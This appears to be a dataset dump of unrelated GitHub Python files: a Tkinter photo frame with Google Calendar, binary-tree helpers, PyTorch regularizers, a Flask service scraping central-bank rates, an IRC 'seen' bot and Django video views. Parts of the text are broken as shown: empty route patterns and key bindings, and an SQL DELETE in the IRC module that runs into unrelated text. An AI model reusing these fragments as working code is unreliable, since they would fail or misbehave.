imageRot.resize((w,h),Image.ANTIALIAS)\n\n image1 = ImageTk.PhotoImage(imageRR)\n fp.close()\n \n #hide or show the calendar\n if photoIsPortrait:\n self.parent.parent.show_cal()\n else:\n self.parent.parent.hide_cal()\n\n #show the photo\n self.panel1.config(image=image1)\n self.panel1.image = image1 \n self.after(config.flip_after_secs*1000, self.flip) \n\nclass Clock(Frame):\n def __init__(self, parent, *args, **kwargs):\n Frame.__init__(self, parent, bg='black')\n # initialize time label\n self.time1 = ''\n self.timeLbl = Label(self, font=('Helvetica', large_text_size), fg=\"white\", bg=\"black\")\n self.timeLbl.pack(side=TOP, anchor=E)\n # initialize day of week\n self.day_of_week1 = ''\n self.dayOWLbl = Label(self, text=self.day_of_week1, font=('Helvetica', medium_text_size), fg=\"white\", bg=\"black\")\n self.dayOWLbl.pack(side=TOP, anchor=E)\n # initialize date label\n self.date1 = ''\n self.dateLbl = Label(self, text=self.date1, font=('Helvetica', medium_text_size), fg=\"white\", bg=\"black\")\n self.dateLbl.pack(side=TOP, anchor=E)\n self.tick()\n\n def tick(self):\n with setlocale(ui_locale):\n if time_format == 12:\n time2 = time.strftime('%I:%M %p') #hour in 12h format\n else:\n time2 = time.strftime('%H:%M') #hour in 24h format\n\n day_of_week2 = time.strftime('%A')\n date2 = time.strftime(date_format)\n # if time string has changed, update it\n if time2 != self.time1:\n self.time1 = time2\n self.timeLbl.config(text=time2)\n if day_of_week2 != self.day_of_week1:\n self.day_of_week1 = day_of_week2\n self.dayOWLbl.config(text=day_of_week2)\n if date2 != self.date1:\n self.date1 = date2\n self.dateLbl.config(text=date2)\n # calls itself every 200 milliseconds\n # to update the time display as needed\n # could use >200 ms, but display gets jerky\n self.timeLbl.after(200, self.tick)\n \nclass Calendar(Frame):\n def __init__(self, parent, *args, **kwargs):\n Frame.__init__(self, parent, bg='black')\n if config.google_calendar_id != False:\n self.title = 'Upcoming' \n else:\n self.title = \"\"\n self.calendarLbl = Label(self, text=self.title, font=('Helvetica', large_text_size), fg=\"white\", bg=\"black\")\n self.calendarLbl.pack(side=TOP, anchor=W)\n self.eventsContainer = Frame(self, bg=\"black\")\n self.eventsContainer.pack(side=TOP)\n if config.google_calendar_id != False:\n self.get_events()\n\n def get_events(self):\n print(\"getting events\")\n try:\n # remove all children\n for widget in self.eventsContainer.winfo_children():\n widget.destroy()\n\n now = datetime.datetime.utcnow().isoformat() + 'Z' # 'Z' indicates UTC time\n print('Getting the upcoming 10 events')\n now = datetime.datetime.utcnow().isoformat() + 'Z' # 'Z' indicates UTC time\n print('Getting the upcoming 10 events')\n events_result = service.events().list(calendarId=config.google_calendar_id, timeMin=now,\n maxResults=10, singleEvents=True,\n orderBy='startTime').execute()\n events = events_result.get('items', [])\n\n if not events:\n eventFrame = calendarevent(self.eventsContainer, \"No upcoming events found\")\n eventFrame.pack(side=TOP, anchor=W)\n print('No upcoming events found.')\n for event in events:\n start = event['start'].get('dateTime', event['start'].get('date'))\n lDate = start.split('T')\n sDT = datetime.datetime.strptime(lDate[0],\"%Y-%m-%d\")\n eventFrame = calendarevent(self.eventsContainer, event['summary'],custom_strftime('%A %B {S}',sDT))\n eventFrame.pack(side=TOP, anchor=W) \n print(event['summary'],custom_strftime('%A %B {S}',sDT))\n \n except Exception as e:\n traceback.print_exc()\n print(\"Error: %s. Cannot get calendar.\" % e)\n\n self.after(millis_between_calendar_checks, self.get_events)\n\n\nclass calendarevent(Frame):\n def __init__(self, parent, event_name=\"\",event_date=\"\"):\n Frame.__init__(self, parent, bg='black')\n\n self.eventName = event_name\n self.eventNameLbl = Label(self, text=self.eventName, font=('Helvetica', medium_text_size), fg=\"white\", bg=\"black\")\n self.eventNameLbl.pack(side=TOP, anchor=W)\n self.eventDate = event_date\n self.eventDateLbl = Label(self, text=self.eventDate, font=('Helvetica', small_text_size), fg=\"white\", bg=\"black\")\n self.eventDateLbl.pack(side=TOP, anchor=W)\n\nclass Blank(Frame):\n def __init__(self, parent, *args, **kwargs):\n Frame.__init__(self, parent, bg='black')\n self.title = 'BLANK' \n self.calendarLbl = Label(self, text=self.title, font=('Helvetica', large_text_size), fg=\"white\", bg=\"black\")\n self.calendarLbl.pack(side=TOP, anchor=W)\n\nclass FullscreenWindow:\n\n def __init__(self):\n self.tk = Tk()\n self.tk.configure(background='black',cursor=\"none\")\n self.topFrame = Frame(self.tk, background = 'black')\n self.topFrame.parent = self\n #self.bottomFrame = Frame(self.tk, background = 'black')\n self.topFrame.pack(side = TOP, fill=BOTH, expand = YES)\n #self.bottomFrame.pack(side = BOTTOM, fill=BOTH, expand = YES)\n self.state = False\n self.tk.bind(\"\", self.toggle_fullscreen)\n self.tk.bind(\"\", self.end_fullscreen)\n self.tk.bind('',self.hide_cal)\n self.tk.bind('',self.show_cal)\n # clock\n self.clock = Clock(self.topFrame)\n self.clock.pack(side=RIGHT, anchor=N, padx=10, pady=0)\n # Calendar\n self.calendar = Calendar(self.topFrame)\n self.calendar.pack(side = RIGHT, anchor=S, padx=20, pady=0)\n # Photo\n self.photo = Photo(self.topFrame)\n self.photo.pack(side=LEFT, anchor=N, padx=0, pady=0)\n #~ # weather\n #~ self.weather = Weather(self.topFrame)\n #~ self.weather.pack(side=LEFT, anchor=N, padx=100, pady=60)\n #~ # news\n #~ self.news = News(self.bottomFrame)\n #~ self.news.pack(side=LEFT, anchor=S, padx=100, pady=60)\n\n #~ self.calendar.pack_forget()\n #blank widget for hidding calendar when there isn't enough room\n #~ self.blank = Blank(self.topFrame)\n #~ self.blank.pack(side=RIGHT, anchor=S, padx=0, pady=0)\n self.toggle_fullscreen()\n\n def toggle_fullscreen(self, event=None):\n self.state = not self.state # Just toggling the boolean\n self.tk.attributes(\"-fullscreen\", self.state)\n return \"break\"\n\n def end_fullscreen(self, event=None):\n self.state = False\n self.tk.attributes(\"-fullscreen\", False)\n return \"break\"\n \n def hide_cal(self, event=None):\n self.calendar.pack_forget()\n print(\"hiding\")\n\n def show_cal(self, event=None):\n self.calendar.pack(side = RIGHT, anchor=S, padx=0, pady=0)\n print(\"showing\")\n\nif __name__ == '__main__':\n #do calendar set-up\n print(\"setting up Google Calendar connection\")\n home_dir = os.path.expanduser('~')\n credential_dir = os.path.join(home_dir, '.credentials')\n if not os.path.exists(credential_dir):\n os.makedirs(credential_dir)\n credential_path = os.path.join(credential_dir,\n 'calendar-python-quickstart.json')\n\n store = file.Storage('token.json')\n creds = store.get()\n if not creds or creds.invalid:\n flow = client.flow_from_clientsecrets(credential_path, SCOPES)\n creds = tools.run_flow(flow, store)\n service = build('calendar', 'v3', http=creds.authorize(Http()))\n\n #set up connection\n userID = config.userID\n password = config.password\n\n client_machine_name = config.client_machine_name\n server_name = config.server_name\n server_ip = config.server_ip\n domain_name = config.domain_name\n\n share_name = config.share_name\n photo_dir = '/' + config.photo_directory\n\n conn = SMBConnection(userID, password, client_machine_name, server_name, domain=domain_name, use_ntlm_v2=True,\n is_direct_tcp=True)\n\n conn.connect(server_ip, 445)\n\n #build a list of folders\n print(\"building directory list\")\n dirs = GetDirs(conn, share_name, photo_dir)\n\n #setup windows and begin event loop\n w = FullscreenWindow()\n w.tk.mainloop()\n\n\n\n","repo_name":"tklenke/YAPSFrame","sub_path":"YAPSFrame.py","file_name":"YAPSFrame.py","file_ext":"py","file_size_in_byte":15364,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"25476348862","text":"class Node:\n def __init__(self, dato):\n self.dato = dato\n self.left = None\n self.right = None\n\n\n# Cuantos Nodos hay?\n\ndef contarNodos(root, cantidad=0):\n if root is None:\n return cantidad\n else:\n nodoIzquierda = contarNodos(root.left)\n nodosDerecha = contarNodos(root.right)\n yo = 1\n return nodoIzquierda + nodosDerecha + yo\n\n\n# Altura del arbol:\n\ndef alturaMax(root):\n if root is None:\n return 0\n else:\n alturaIzq = alturaMax(root.left)\n alturaDer = alturaMax(root.right)\n return max(alturaIzq, alturaDer) + 1\n\n\nroot = Node(1)\nnodo2 = Node(2)\nnodo3 = Node(3)\nnodo4 = Node(4)\nnodo5 = Node(5)\nnodo6 = Node(6)\nnodo7 = Node(7)\n\nroot.left = nodo2\nroot.right = nodo3\nnodo3.left = nodo4\nnodo3.right = nodo5\nnodo2.left = nodo6\nnodo2.right = nodo7\n\nprint(\"La cantidad de nodos es: \")\nprint(contarNodos(root))\nprint(\"La altura del arbol es:\")\nprint(alturaMax(root))\n","repo_name":"PabloBaezS/Estructuras_datos_algoritmos","sub_path":"Seguimiento 2/AlturaNodos.py","file_name":"AlturaNodos.py","file_ext":"py","file_size_in_byte":956,"program_lang":"python","lang":"es","doc_type":"code","stars":1,"dataset":"github-code","pt":"7"} +{"seq_id":"11367694567","text":"#str='hello boo' #this gives an error thus use try block becoz there was no num in str\r\n#istr=int(str)\r\n#print(istr)\r\n\r\nstr='hello boo' #when the first conversion fails it will jump into except block\r\ntry:\r\n istr=int(str)\r\nexcept:\r\n istr=-1\r\nprint('first',istr)\r\nstr='123' #here it is crct so it will execute try block\r\ntry:\r\n istr=int(str)\r\nexcept:\r\n istr=-1\r\nprint('second',istr)\r\n\r\n#output\r\n#first -1\r\n#second 123\r\n","repo_name":"Sneha255-prog/PYTHON-PROG","sub_path":"tryexcept.py","file_name":"tryexcept.py","file_ext":"py","file_size_in_byte":439,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"15456072300","text":"from typing import Dict, Union, Tuple\nimport numpy as np\n\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\n\nfrom .utils import hoyer\n\n\n__all__ = [\"hoyer_loss\", \"l1_loss\", \"l2_loss\"]\n\n\ndef hoyer_loss(features: Dict[str, torch.Tensor] = {}, dim: Union[int, Tuple[int]] = None, epsilon: float = 0.000000000001) -> torch.float:\n \"\"\"\n Hoyer square loss: https://arxiv.org/pdf/1908.09979.pdf\n\n Takes a dictionary of tensors\n\n returns (|feature|_1)^2/((|feature|_2)^2 + epsilon)\n \"\"\"\n loss = 0\n for feature in features:\n loss += torch.mean(hoyer(x=features[feature], dim=dim, epsilon=epsilon)**2)\n return loss\n\n\ndef l1_loss(features: Dict[str, torch.Tensor] = {}, dim: Union[int, Tuple[int]] = None) -> torch.float:\n \"\"\"\n L1 loss: L1 norm of the given tensors disctionary\n\n Takes a dictionary of tensors\n\n returns |feature|_1\n \"\"\"\n loss = 0\n for feature in features:\n loss += torch.mean(torch.sum(torch.abs(features[feature]), dim=dim))\n return loss\n\n\ndef l2_loss(features: Dict[str, torch.Tensor] = {}, dim: Union[int, Tuple[int]] = None) -> torch.float:\n \"\"\"\n L2 loss: L2 norm of the given tensors disctionary\n\n Takes a dictionary of tensors\n\n returns |feature|_2\n \"\"\"\n loss = 0\n for feature in features:\n loss += torch.mean(torch.sqrt(torch.sum(features[feature]**2, dim=dim)))\n return loss\n\n\ndef saliency_K(features: Dict[str, torch.Tensor], K: int, saliency_lambda: float = 1.0, dim: Union[int, Tuple[int]] = None, **kwargs):\n\n # sort in channel dimension; each patch's outputs should be sparse\n loss = 0\n for feature in features:\n sorted = torch.sort(features[feature].abs(), dim=1, descending=True)[0]\n top_K_avg = sorted[:, :K].mean(dim=1)\n bottom_avg = sorted[:, K:].mean(dim=1)\n loss += top_K_avg-saliency_lambda*bottom_avg\n return loss\n","repo_name":"metehancekic/hebbian","sub_path":"src/lib/pytorch_utils/loss/regularizers.py","file_name":"regularizers.py","file_ext":"py","file_size_in_byte":1891,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"2042298464","text":"#!/usr/bin/env python3\nfrom typing import Dict\n\nimport requests\n\nfrom flask import (\n Flask,\n request, abort, jsonify\n)\nfrom bs4 import BeautifulSoup as bs\n\nCBR_BASE_URL = \"https://www.cbr.ru/eng\"\nCBR_DAILY_URL = f\"{CBR_BASE_URL}/currency_base/daily/\"\nCBR_KEY_INDICATORS_URL = f\"{CBR_BASE_URL}/key-indicators/\"\n\napp = Flask(__name__)\n\n\nclass Asset:\n def __init__(self, name: str, capital: float, interest: float, char_code: str):\n self.name = name\n self.capital = capital\n self.interest = interest\n self.char_code = char_code\n\n def calculate_revenue(self, years: int, rate: float) -> float:\n \"\"\"Сам расчёт\"\"\"\n revenue = rate * self.capital * ((1.0 + self.interest) ** years - 1.0)\n return revenue\n\n\ndef parse_cbr_currency_base_daily(html_data: str) -> Dict[str, float]:\n \"\"\"Парсим html-ку с ежедневными значениями\"\"\"\n curr_rate = {}\n beautiful_soup = bs(html_data, 'html.parser')\n html = beautiful_soup.find('html')\n body = html.find('body')\n main = body.find('main', id='content')\n\n div_1 = main.find('div', class_='offsetMenu')\n div_2 = div_1.find('div', class_='container-fluid')\n div_3 = div_2.find('div', class_='col-md-23 offset-md-1')\n div_4 = div_3.find('div', class_='table-wrapper')\n div_5 = div_4.find('div', class_='table')\n table = div_5.find('table', class_='data')\n table_body = table.find('tbody')\n rows = table_body.find_all('tr')\n for i in range(1, len(rows)):\n row = rows[i]\n tds = row.find_all('td')\n char_code = tds[1].string\n unit = float(tds[2].string.replace(\",\", \"\"))\n rate = float(tds[4].string.replace(\",\", \"\"))\n curr_rate[char_code] = rate / unit\n return curr_rate\n\n\ndef parse_cbr_key_indicators(html_data: str) -> Dict[str, float]:\n \"\"\"Парсим html-ку с ключевыми индикаторами\"\"\"\n curr_rate = {}\n beautiful_soup = bs(html_data, 'html.parser')\n html = beautiful_soup.find('html')\n body = html.find('body')\n main = body.find('main', id='content')\n\n div_1 = main.find('div', class_='offsetMenu')\n div_2 = div_1.find('div', class_='container-fluid')\n div_3 = div_2.find('div', class_='col-md-23 offset-md-1')\n div_4 = div_3.find('div', class_='dropdown')\n div_5 = div_4.find('div', class_='dropdown_content')\n div_6 = div_5.find_all('div', class_='key-indicator_content offset-md-2')\n for k in range(3):\n div_7 = div_6[k].find('div', class_='key-indicator_table_wrapper')\n div_8 = div_7.find('div', class_='table key-indicator_table')\n table = div_8.find('table')\n table_body = table.find('tbody')\n rows = table_body.find_all('tr')\n for i in range(1, len(rows)):\n row = rows[i]\n tds = row.find_all('td')\n div_1 = tds[0].find('div')\n if div_1:\n div_2 = div_1.find_all('div')\n char_code = div_2[1].string\n if tds[-1].string:\n try:\n value_2 = float(tds[-1].string.replace(\",\", \"\"))\n curr_rate[char_code] = value_2\n except ValueError:\n pass\n return curr_rate\n\n\nclass AssetList:\n def __init__(self, name):\n self.name = name\n self.asset_dict = {}\n\n def cleanup(self):\n \"\"\"cleanup\"\"\"\n self.asset_dict = {}\n\n def calculate_all_revenue(self, period: int) -> float:\n \"\"\"calculate_revenue\"\"\"\n cbr_daily_response = requests.get(CBR_DAILY_URL)\n cbr_key_indicators_response = requests.get(CBR_KEY_INDICATORS_URL)\n if not (cbr_daily_response.ok or cbr_key_indicators_response.ok):\n raise ValueError()\n currency_dict = parse_cbr_currency_base_daily(cbr_daily_response.text)\n metal_dict = parse_cbr_key_indicators(cbr_key_indicators_response.text)\n total_revenue = 0\n for asset in self.asset_dict.values():\n if asset.char_code in metal_dict:\n rate = metal_dict[asset.char_code]\n else:\n rate = currency_dict.get(asset.char_code, 0)\n revenue = asset.calculate_revenue(period, rate)\n total_revenue += revenue\n return total_revenue\n\n def get_asset_list(self, name_list=None):\n m_asset_list = []\n for asset in self.asset_dict.values():\n if name_list is None or asset.name in name_list:\n asset_repr = [asset.char_code, asset.name, asset.capital, asset.interest]\n m_asset_list.append(asset_repr)\n m_asset_list = sorted(m_asset_list, key=lambda x: x[1])\n m_asset_list = sorted(m_asset_list, key=lambda x: x[0])\n return m_asset_list\n\n\n@app.errorhandler(404)\ndef not_found(_ignored):\n \"\"\"Обращение по несуществующему route\"\"\"\n return \"This route is not found\", 404\n\n\n@app.errorhandler(503)\ndef not_exist(_ignored):\n \"\"\"Недоступность cbr.ru\"\"\"\n return 'CBR service is unavailable', 503\n\n\n@app.route(\"/api/asset/cleanup\")\ndef cleanup_asset_list():\n \"\"\"Очистить список активов.\"\"\"\n asset_list.cleanup()\n return 'there are no more assets', 200\n\n\n@app.route(\"/api/asset/calculate_revenue\")\ndef calculate_revenue():\n \"\"\"Оценочная инвестиционная доходность\"\"\"\n try:\n user_period = request.args.getlist(\"period\")\n revenues = {}\n for period in user_period:\n revenue = asset_list.calculate_all_revenue(int(period))\n revenues[str(int(period))] = revenue\n return jsonify(revenues)\n except Exception:\n abort(503)\n\n\n@app.route(\"/api/asset/get\")\ndef get_asset_list_by_name():\n \"\"\"Список всех перечисленных активов\"\"\"\n user_name_list = request.args.getlist(\"name\")\n m_asset_list = asset_list.get_asset_list(user_name_list)\n return jsonify(m_asset_list)\n\n\n@app.route(\"/api/asset/list\")\ndef get_asset_list():\n \"\"\"Список всех доступных активов\"\"\"\n m_asset_list = asset_list.get_asset_list()\n return jsonify(m_asset_list)\n\n\n@app.route(\"/api/asset/add////\")\n@app.route(\"/api/asset/add////\")\n@app.route(\"/api/asset/add////\")\n@app.route(\"/api/asset/add////\")\ndef add_asset(char_code, name, capital, interest):\n \"\"\"Возможность работать с портфелем активов в формате Web-сервиса\"\"\"\n if name not in asset_list.asset_dict:\n new_asset = Asset(name, float(capital), float(interest), char_code)\n asset_list.asset_dict[name] = new_asset\n return f\"Asset '{name}' was successfully added\", 200\n return f\"Asset '{name}' is already exist\", 403\n\n\n@app.route(\"/cbr/daily\")\ndef get_cbr_daily():\n \"\"\"Запрос на страницу “daily” (взять курсы валют), ответ: {“char_code”: rate}\"\"\"\n try:\n cbr_daily_response = requests.get(CBR_DAILY_URL)\n if not cbr_daily_response.ok:\n abort(503)\n curr_dict = parse_cbr_currency_base_daily(cbr_daily_response.text)\n return curr_dict\n except Exception:\n abort(503)\n\n\n@app.route(\"/cbr/key_indicators\")\ndef get_cbr_key_indicators():\n \"\"\"Запрос на страницу “key-indicators” (взять USD, EUR и драг металлы), ответ {“char_code”: rate}\"\"\"\n try:\n cbr_key_indicators_response = requests.get(CBR_KEY_INDICATORS_URL)\n if not cbr_key_indicators_response.ok:\n abort(503)\n metal_dict = parse_cbr_key_indicators(cbr_key_indicators_response.text)\n return metal_dict\n except Exception:\n abort(503)\n\n\nasset_list = AssetList(\"global_list\")\n","repo_name":"makaryb/2021-python","sub_path":"task8/task_Boriskin_Makary_asset_web_service.py","file_name":"task_Boriskin_Makary_asset_web_service.py","file_ext":"py","file_size_in_byte":7994,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"46999208672","text":"import re, sqlite3, time, random\nfrom modules.monitor import User\nfrom bot import is_on_channel, same_nick\n\n\nDEBUG=False # True = alle Plugin-Exceptions fatal\n\nlast_action_time = 0\nACTION_TIMEOUT = 1.5\n\ndef approve_action():\n\tglobal last_action_time\n\tif last_action_time + ACTION_TIMEOUT > time.time():\n\t\treturn False\n\telse:\n\t\tlast_action_time = time.time()\n\t\treturn True\n\n\nconnection = None\ndef get_connection():\n\tglobal connection\n\tif not connection:\n\t\tconnection = sqlite3.connect(\"seen.db\")\n\treturn connection\n\n\n# FIXME: Das sollte nur der Bot-Owner können, wir haben aber noch kein \n# richtiges AAA-Konzept\ndef seen_initmsgdb( plugin, connection, channel, source_nick, args ):\n\tcon = get_connection()\n\tc = con.cursor()\n\ttry:\n\t\tc.execute( \"\"\"drop table messages\"\"\" )\n\texcept sqlite3.OperationalError as e:\n\t\tprint( e )\n\tc.execute( \"\"\"create table messages (id integer primary key, \n\t\ttime integer, author text, recipient text, msg txt, received integer)\"\"\" )\n\tcon.commit()\n\tc.close()\n\n\ndef seen_setmsg( plugin, connection, channel, source_nick, msg ):\n\tcon = get_connection()\n\tc = con.cursor()\n\tc.execute( \"\"\"insert into messages (time,author,recipient,msg,received)\n\t\t values(?,?,?,?,?)\"\"\", \n\t\t (time.time(), source_nick.strip().lower(), \"\", msg, 0) )\n\tcon.commit()\n\tc.close()\n\n\ndef seen_getmsg( plugin, connection, channel, source_nick, nick ):\n\tcon = get_connection()\n\tc = con.cursor()\n\tc.execute( \"\"\"select id, time, author, recipient, msg, received \n\t\tfrom messages where id=(select max(id) from messages \n\t\twhere author=? and recipient='')\"\"\",\n\t\t(nick.strip().lower(),) )\n\tfor row in c:\n\t\t_id, _time, _author, _recipient, _msg, _received = row\n\t\t_time = time.strftime( '%d.%m.%Y %H:%M:%S',time.localtime( _time ) )\n\t\tconnection.action( channel, \"hat am %(_time)s von %(_author)s folgende, öffentliche Nachricht notiert: %(_msg)s\" \\\n\t\t\t% locals() )\n\t\tc.execute( \"\"\"update messages set received=received+1 where id=?\"\"\", \n\t\t\t(_id,) )\n\tcon.commit()\n\tc.close()\n\n\n# FIXME: Das sollte nur der Bot-Owner können, wir haben aber noch kein \n# richtiges AAA-Konzept\ndef seen_initseendb( plugin, connection, channel, source_nick, args ):\n\tcon = get_connection()\n\tc = con.cursor()\n\ttry:\n\t\tc.execute( \"\"\"drop table seen\"\"\" )\n\texcept sqlite3.OperationalError as e:\n\t\tprint( e )\n\tc.execute( \"\"\"create table seen (id integer primary key, \n\t\ttime integer, nick text, channel text, server txt, eventtype text, msg text)\"\"\" )\n\tcon.commit()\n\tc.close()\n\n\ndef seen_seen( plugin, connection, channel, source_nick, nick ):\n\tif not nick:\n\t\tconnection.action( channel, \"==> !seen | !setmsg | !getmsg \" )\n\telif same_nick( source_nick, nick ):\n\t\tconnection.action( channel, \"glaubt, dass %(source_nick)s an Identitätsstörungen leidet und macht sich unauffällig eine Notiz.\" % locals() )\n\telif is_on_channel( plugin, connection, channel, nick ):\n\t\tconnection.action( channel, \"reicht %(source_nick)s eine Brille und zeigt auf die Besucherliste. %(nick)s ist doch da!\" % locals() )\n\telif random.randint(1,10)==1:\n\t\tconnection.action( channel, \"findet, dass es in Mecklenburg-Vorpommern schöne Seen gibt, weiß aber nicht was %(nick)s davon hält.\" % locals() )\n\telse:\n\t\tcon = get_connection()\n\t\tc = con.cursor()\n\t\t# Das Statement generiert durch die Subselect-Konstruktion mit max(id)\n\t\t# nur den neuesten Eintrag der auf einen Suchausdruck passt:\n\t\tc.execute( \"\"\"select id, time, nick, eventtype, msg\n\t\t\tfrom seen where id=(\n\t\t\t\tselect max(id) from seen \n\t\t\t\twhere nick like ? and channel=? and server=?)\"\"\",\n\t\t\t(nick.strip().lower().replace('*','%'),channel,connection.server) )\n\t\trows = c.fetchall()\n\t\tif rows:\n\t\t\t_id, _time, _nick, _eventtype, _msg = rows[0]\n\t\t\t_time = time.strftime( '%d.%m.%Y %H:%M:%S',time.localtime( _time ) )\n\t\t\ttxt = \"hat %(_nick)s zuletzt am %(_time)s gesehen, als sie oder er\"\n\t\t\tif _eventtype==\"join\":\n\t\t\t\ttxt += \" den Raum betrat\"\n\t\t\telif _eventtype==\"part\":\n\t\t\t\ttxt += \" den Raum verließ\"\n\t\t\telif _eventtype==\"nick\":\n\t\t\t\ttxt += \" den Namen änderte\"\n\t\t\telif _eventtype==\"namreply\":\n\t\t\t\ttxt += \" hier herumstromerte\"\n\t\t\telif _eventtype==\"quit\":\n\t\t\t\ttxt += \" die Verbindung verlor\"\n\t\t\tif _msg:\n\t\t\t\ttxt += \" (%(_msg)s)\"\n\t\t\ttxt += \".\"\n\t\t\tconnection.action( channel, txt % locals() )\n\t\telse:\n\t\t\ttxt = \"ich kann mich nicht erinnern, dass %s jemals hier gewesen wäre.\"\n\t\t\tconnection.privmsg( channel, txt % nick )\n\t\tc.execute(\"\"\"DELETE FROM \"seen\" WHERE \"time\" %s in #sozphobie\" % (ref_old.nick, ref_new.nick) )\n\t\t\t\t\tc.execute( \"\"\"insert into seen (time,nick,channel,server,eventtype,msg)\n\t\t\t\t\t\t values(?,?,?,?,?,?)\"\"\", \n\t\t\t\t\t\t (time.time(), ref_old.nick, channel.name, \n\t\t\t\t\t\t \tconnection.server, event.eventtype(), \"danach: \"+ref_new.nick) )\n\t\t\t\t\tc.execute( \"\"\"insert into seen (time,nick,channel,server,eventtype,msg)\n\t\t\t\t\t\t values(?,?,?,?,?,?)\"\"\", \n\t\t\t\t\t\t (time.time(), ref_new.nick, channel.name, \n\t\t\t\t\t\t \tconnection.server, event.eventtype(), \"zuvor: \"+ref_old.nick) )\n\t\t\tcon.commit()\n\t\t\tc.close()\n\t\t\t\t\n\n\nHANDLERS = {\n\t\"privmsg\" : handle_msg,\n\t\"pubmsg\" : handle_msg,\n\t\"namreply\" : handle_namreply,\n\t\"join\" : handle_joinpart,\n\t\"part\" : handle_joinpart,\n\t\"quit\" : handle_joinpart,\n\t\"nick\" : handle_nick_change,\n}\n\n","repo_name":"syslock/sozphobine","sub_path":"modules/seen.py","file_name":"seen.py","file_ext":"py","file_size_in_byte":8063,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"71589669693","text":"with open(\"./2015/day1/data.txt\", \"r\") as f:\n x = 0\n c = 1\n\n for i in f.read():\n if i == \"(\": x += 1\n else: x -= 1\n\n if x == -1:\n print(c)\n break\n\n c += 1\n\n# answer: 1795","repo_name":"shashwatb14/AdventOfCode","sub_path":"2015/day1/part2.py","file_name":"part2.py","file_ext":"py","file_size_in_byte":229,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"19709817588","text":"from django.shortcuts import render,redirect\nfrom .models import Videos,Comments,CommentLike,Category,profile,Reply\nfrom django.contrib.auth.models import User\nfrom django.contrib import auth\nfrom django.contrib.auth.views import login_required\nfrom rest_framework import viewsets\nfrom .serializers import Videos,VideosSerializers\nfrom rest_framework.authentication import TokenAuthentication,SessionAuthentication\nfrom rest_framework.permissions import IsAdminUser,IsAuthenticated\n# Create your views here.\n\n\nclass VideosViewSet(viewsets.ModelViewSet):\n serializer_class = VideosSerializers\n queryset = Videos.objects.all()\n #authentication_classes = [SessionAuthentication,TokenAuthentication]\n #permission_classes = [IsAdminUser]\n\n\n\n\ndef home(request):\n videos = Videos.objects.all()\n if request.GET.get('search') is not None:\n videos = Videos.objects.filter(title=request.GET.get('search'))\n if len(videos) == 0:\n category = Category.objects.filter(title=request.GET.get('search'))\n videos = []\n for i in category:\n videos.append(Videos.objects.get(id=i.video.id))\n\n if len(videos)==0:\n try:\n videos = Videos.objects.filter(user=User.objects.get(username=request.GET.get('search')))\n except:\n video = []\n\n return render(request,'blogapp/home.html',{'videos':videos})\n\ndef watch(request,id):\n video = Videos.objects.get(id=id)\n if request.user.is_authenticated:\n if request.method == 'POST':\n comment = Comments()\n comment.video = video\n comment.comment = request.POST['comment']\n comment.user = request.user\n comment.save()\n\n return render(request, 'blogapp/watch.html', {'video': video})\n\n\ndef comments(request,title):\n title = title.split('/')[-1]\n video = Videos.objects.get(id=int(title))\n comments = Comments.objects.filter(video=video.id)\n likes = []\n replys = []\n try:\n for comment in comments:\n\n if Reply.objects.filter(comment=comment):\n replys.append(Reply.objects.filter(comment=comment))\n except:\n pass\n if comments == None:\n return render(request,'blogapp/comments.html')\n\n #return render(request, 'blogapp/comments.html', {'video': video,'comments':comments})\n\n return render(request, 'blogapp/comments.html', {'video': video, 'comments': comments,'replys':replys,'likes':likes})\n\n\n\n@login_required\ndef like(request,id):\n video = Videos.objects.get(id=id)\n comment = Comments.objects.get(video=video)\n comment_likes = CommentLike.objects.get(comment=comment)\n return redirect(request.META.get('HTTP_REFERER'))\n\n@login_required\ndef add_video(request):\n if request.method == 'POST':\n video = Videos()\n video.title,video.discreption,video.thumbnail,video.video = request.POST['title'],request.POST[\"discreption\"],request.FILES['thumbnail'],request.FILES['video']\n video.user = request.user\n video.save()\n return redirect('home')\n return render(request,'blogapp/add_video.html')\n\n@login_required\ndef update_profile(request,id):\n if request.method == 'POST':\n\n try:\n pro = profile.objects.get(id=User.objects.get(id=id).profile.id)\n pro.delete()\n user = User()\n user.id = request.user.id\n user.first_name,user.last_name,user.profile.profile_discreption,user.profile.image = request.POST['first_name'],request.POST['last_name'],request.POST['profile_discreption'],request.FILES['image']\n user.profile.user=request.user\n user.save()\n except:\n pro = profile()\n pro.user = request.user\n pro.profile_discreption = request.POST['profile_discreption']\n pro.image = request.FILES['image']\n pro.save()\n\n user = User.objects.get(id=id)\n\n user.first_name, user.last_name = request.POST['first_name'], request.POST['last_name']\n user.save()\n return redirect(request.META.get('HTTP_REFERER'))\n\n@login_required\ndef reply(request,id):\n if request.method == 'POST':\n comment = Comments.objects.get(id=id)\n reply =Reply()\n reply.comment = comment\n reply.reply = request.POST['reply']\n reply.user = request.user\n reply.save()\n\n return redirect(\"/watch/\"+str(comment.video.id))\n\n@login_required\ndef commentlike(request,id):\n like = CommentLike.objects.get(like=request.user)\n if like:\n like.delete()\n else:\n like.comment = Comments.objects.get(id=id)\n like.like = request.user\n like.save()\n return redirect(request.META.get('HTTP_REFERER'))","repo_name":"Laksh8/bing_watch","sub_path":"watch/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":4749,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"78"} +{"seq_id":"45241140340","text":"'''\r\nBenny's Plagiarism Filter\r\nMengecek set-set yang berisi 64-bit hashcode dari file-file submisi tugas\r\npemrograman dan mencetak output berupa set yang berisi hashcode yang tidak\r\nmemiliki duplikat.\r\n'''\r\n\r\nset_qty = int(input(\"Masukkan banyaknya set yang akan diinput: \"))\r\ncurr_set = set()\r\n\r\nprint(\"Untuk {} baris berikutnya, masukkan set yang berisi \".format(set_qty) +\r\n \"hashcode yang akan dicek:\")\r\n\r\n'''\r\nMeminta input berupa set sebanyak set_qty yang telah diinput oleh user.\r\nUntuk setiap set yang diinput, hilangkan spasi untuk menyeragamkan set 